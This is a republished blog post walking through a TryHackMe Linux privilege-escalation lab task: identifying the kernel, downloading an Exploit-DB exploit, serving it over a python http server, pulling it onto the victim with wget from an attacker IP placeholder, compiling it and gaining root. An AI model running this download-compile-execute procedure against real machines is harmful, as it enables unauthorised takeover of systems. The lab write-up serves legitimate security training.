This content originally appeared on DEV Community and was authored by Michael Oladele
Completing the TryHackMe Linux Privilege Escalation labs on the Jr Penetration Tester path has been challenging to me. I thought I needed to write about it. Let's get started!
I will skip some of the informational part and jump straight to task 5.
Task 1: Introduction
Task 2: What is Privilege Escalation?
Task 3: Enumeration
It does not matter how you gain the initial foothold, When you land on your target machine the first thing you want to do is Enumeration.
To get the full enumeration steps, head over to TryHackMe Linux Privilege Escalation labs
Now let's dive into the main reason for this article:
Task 5: Privilege Escalation: Kernel Exploits:
This task expects that we escalate our privilege via kernel exploit.
Steps:
- Get a foothold into the target system, in this case, we SSH into the target machine from our attack machine with the details provided
- We are to escalate through kernel exploit, we need to get the kernel of the machine by running the code below:
uname -a
- Now we have the kernel name, we need to search exploit DB for exploit to use against the victim machine kernel. We are in luck, we found an exploit on exploit DB. In most cases we might have to dig a little more on the internet.
- Click Download to download the exploit to your attacker machine
- The next step is to find a way to get the exploit code to the victim machine. I will be doing this with python3 http server.
- On the attacker's machine, run the code below in the same
dir
you have the file hosted run on port 8080.
python3 -m http.server 8080
- Once your server is running on the attacker's machine, on the victim's machine, you will need to get the file with
wget
. Run the command below on the victim's machine:
wget http://<attacker's_IP: <Port>/<file_name>
If we check the dir
with ls
I can see the downloaded file in the dir
. On the victim's machine.
- After the download, run the command below to compile the
C
file on the victim's machine.
gcc <filename.c> -o <name_want_to_call_the_compiled_file> -w
- Then you need to give
writable permission
to the compiled file.
If successful, you should see the file name in the dir
, then run id
to see current user id:
You can see that we have the regular user at the moment:
- Then run the exploit code:
Now we are root after we run the exploit code:
Conclusion
This is the end of the first part of this series. Watch out for
Tasks 6 - 12.
I hope this helped someone as this lab really challenged me, but it was so much fun and it felt good to complete it. Anyways, I got through it and now, so have you!
It's Michael
This content originally appeared on DEV Community and was authored by Michael Oladele
Michael Oladele | Sciencx (2024-06-30T20:11:31+00:00) Try Hack Me: Linux PrivEsc Complete Steps. Retrieved from https://www.scien.cx/2024/06/30/try-hack-me-linux-privesc-complete-steps/
Please log in to upload a file.
There are no updates yet.
Click the Upload button above to add an update.